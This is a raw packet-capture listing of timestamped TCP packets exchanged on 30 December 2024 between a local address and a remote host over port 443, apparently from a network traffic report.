                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.442722082 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.442749977 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.621521950 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.621527910 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.621565104 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.622451067 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.706353903 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.706382036 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.706423044 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.706437111 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.706459045 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.706475973 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.708401918 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.708429098 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.708489895 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.708503008 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.708638906 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.708684921 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.708702087 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.708708048 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.708734989 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.708760977 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.709017038 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.709033012 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.709069014 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.709074974 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.709091902 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.709227085 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.709248066 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.709276915 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.709281921 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.709295034 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.709326029 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.709506035 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.709532022 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.709588051 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.709593058 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.709759951 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.709774971 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.709825993 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.709832907 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.709872961 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.710202932 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.710215092 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.710217953 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.710256100 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.710262060 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.710278034 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.710305929 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.716793060 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.795053005 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.795073986 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.795346022 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.795356035 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.795419931 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.797115088 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.797128916 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.797208071 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.797213078 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.797297001 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.797322989 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.797348022 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.797353983 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.797375917 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.797401905 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.797621012 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.797636986 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.797687054 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.797693014 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.797712088 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.797734976 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.797848940 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.797877073 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.797910929 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.797915936 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.797940969 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.797954082 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.798192978 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.798226118 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.798252106 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.798257113 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.798291922 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.798301935 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.798438072 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.798461914 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.798496008 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.798506021 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.798530102 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.798543930 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.798847914 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.798868895 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.798903942 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.798908949 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.798937082 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.798953056 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.799285889 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.883686066 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:34.883707047 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.149615049 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.149638891 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.149730921 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.149746895 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.151555061 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.151571989 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.151654959 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.151660919 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.151859045 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.151878119 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.151926041 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.151932955 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.151943922 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.152216911 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.152235031 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.152275085 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.152281046 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.152311087 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.152334929 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.152450085 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.152472019 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.152517080 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.152528048 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.152714968 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.152731895 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.152769089 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.152775049 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.152801037 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.152822971 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.153032064 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.153044939 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.153100967 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.153105974 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.153366089 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.153398037 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.153424025 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.153429031 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.153455019 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.153481007 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.154028893 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.238548040 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.238570929 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.238617897 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.238630056 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.238660097 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.238671064 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.240359068 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.240374088 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.240443945 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.240448952 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.240570068 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.240859985 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.240880013 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.240916014 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.240926027 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.240941048 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.240962029 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241206884 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241221905 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241270065 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241276026 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241302967 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241316080 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241473913 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241488934 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241525888 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241529942 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241552114 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241564989 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241585016 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241604090 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241630077 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241635084 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241657972 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241672993 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241801977 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241816044 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241856098 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241862059 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241878986 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.241902113 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.242229939 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.242248058 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.242279053 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.242284060 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.242307901 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.242326021 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.242964029 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.379354954 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.379378080 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.379476070 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.379492998 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.379623890 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.379772902 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.379789114 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.379827976 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.624027967 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.624033928 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.624046087 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.624075890 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.627098083 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.710841894 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.710863113 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.710942030 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.710954905 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711004019 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711064100 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711081982 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711133003 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711138010 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711186886 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711204052 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711400986 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711437941 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711462021 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711466074 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711493969 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711505890 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711574078 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711604118 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711626053 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711632013 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711657047 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711668968 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711791992 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711805105 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711854935 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711860895 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.711904049 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.712163925 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.712177038 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.712234974 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.712241888 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.712285042 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.713154078 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.713169098 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.713222980 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.713228941 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.713270903 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.713341951 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.713361979 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.713406086 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.713411093 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.713458061 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.715581894 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.799422026 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.799446106 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.799484015 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.799495935 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.799506903 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.799536943 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.799788952 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.799830914 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.799856901 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.799863100 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.799886942 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.799913883 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.800048113 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.800061941 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.800095081 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.800101042 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.800121069 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.800139904 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.800235987 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.800251961 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.800283909 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.800287962 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.800312042 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.800329924 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.800590992 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.800612926 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.800649881 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.800654888 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.800682068 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.800694942 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.800867081 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.800884962 CET44349746172.67.208.58192.168.2.4
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.800916910 CET49746443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                Dec 30, 2024 19:10:35.800920010 CET44349746172.67.208.58192.168.2.4
